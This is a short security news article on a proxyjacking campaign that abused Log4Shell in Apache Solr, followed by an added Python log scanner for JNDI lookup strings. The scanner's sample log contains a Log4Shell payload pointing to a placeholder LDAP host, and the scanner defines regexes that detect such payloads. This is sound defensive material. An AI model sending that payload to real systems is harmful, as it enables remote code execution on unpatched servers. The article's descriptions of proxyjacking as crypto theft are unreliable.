A new Proxyjacking campaign still abuses the Log4j vulnerability

April 19, 2023

A new cybercriminal campaign called Proxyjacking has exploited last year’s critical Log4j vulnerability. According to reports, the campaign operators used the infamous flaw to harvest IP addresses from their victims. The flaw allowed the actors to infiltrate targeted systems without authorisation.

Hijacking IP addresses has long been a prevalent tactic among threat actors, who have used it for numerous adware attacks over the past years.

The new Proxyjacking campaign is a common cryptocurrency attack that results in financial loss.

According to investigations, the newly discovered Proxyjacking attack resembles a cryptojacking operation and steals crypto funds. The researchers explained that if the threat actors compromised at least 100 IPs, they could generate a monthly profit of about $1,000.

Hence, many threat actors have adopted this technique, as it is a lucrative and efficient method of stealing from compromised IP addresses. In addition, the Proxyjacking actors use minimal computing power and energy.

The campaign exploits the Log4j vulnerability to gain initial access to victims’ systems. The threat actors then install an agent that turns the infected host into a proxy server. This detail showed that the threat actors used a different tool than a standard backdoor.

These tactics allowed the attackers to harvest the IP information of devices and sell it on the proxyware market. In this incident, the adversaries abused an outdated Apache Solr service to take over the Kubernetes environment.

The critical Log4j flaw remains a significant threat to all users despite the release of security updates. A recent tally showed that over 70% of organisations were still affected by the Log4Shell flaw in October last year.

The new Proxyjacking campaign allows the threat actors to earn rewards with minimal work, which indicates that it could soon evolve into a more significant threat. As of now, the operator uses a short list of proxyware services.

Experts suggest that potential targets adopt robust threat detection to receive alerts on initial access and payload activities. This defensive measure could allow them to mitigate the effects of these attacks.
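The initial-access alerting the experts recommend can start with the web server logs of internet-facing services such as the Apache Solr instance mentioned above. The following is an added example, not code from the article or from any vendor it cites: a small Python scanner that flags Log4Shell-style JNDI lookup strings in access-log lines. The log lines, IP addresses and the `EXAMPLE-PLACEHOLDER` host are all constructed for the example.

```python
import re
from typing import Optional

# Constructed sample access-log lines (not taken from the article). The second
# line carries a JNDI lookup string in its User-Agent field, which is the kind
# of input that triggers the Log4Shell vulnerability in unpatched Log4j.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2023:10:01:02 +0000] "GET /solr/admin/info/system HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Apr/2023:10:01:09 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 874 "-" "${jndi:ldap://EXAMPLE-PLACEHOLDER/a}"
10.0.0.9 - - [19/Apr/2023:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 120 "-" "curl/7.88"
"""

# A plain "${jndi:" lookup anywhere in the request data.
DIRECT_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Log4j also resolves lookups nested inside other lookups, so a "${" that opens
# before the previous one is closed is suspicious even when "jndi" is not
# visible literally. Treat it as a lower-confidence finding.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line: str) -> Optional[str]:
    """Return a finding label for one log line, or None if nothing suspicious."""
    if DIRECT_JNDI.search(line):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(line):
        return "nested-lookup"
    return None


def scan_log(text: str) -> list:
    """Scan a whole log and return one finding dict per suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        label = classify_line(line)
        if label is None:
            continue
        # Common log format: the client address is the first field.
        src_ip = line.split(" ", 1)[0]
        findings.append({"line": lineno, "src_ip": src_ip, "finding": label})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A finding on an internet-facing service is the "initial access" alert the article refers to; correlating the source address with later outbound connections or newly installed processes on the same host is how the "payload activity" stage would be caught.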
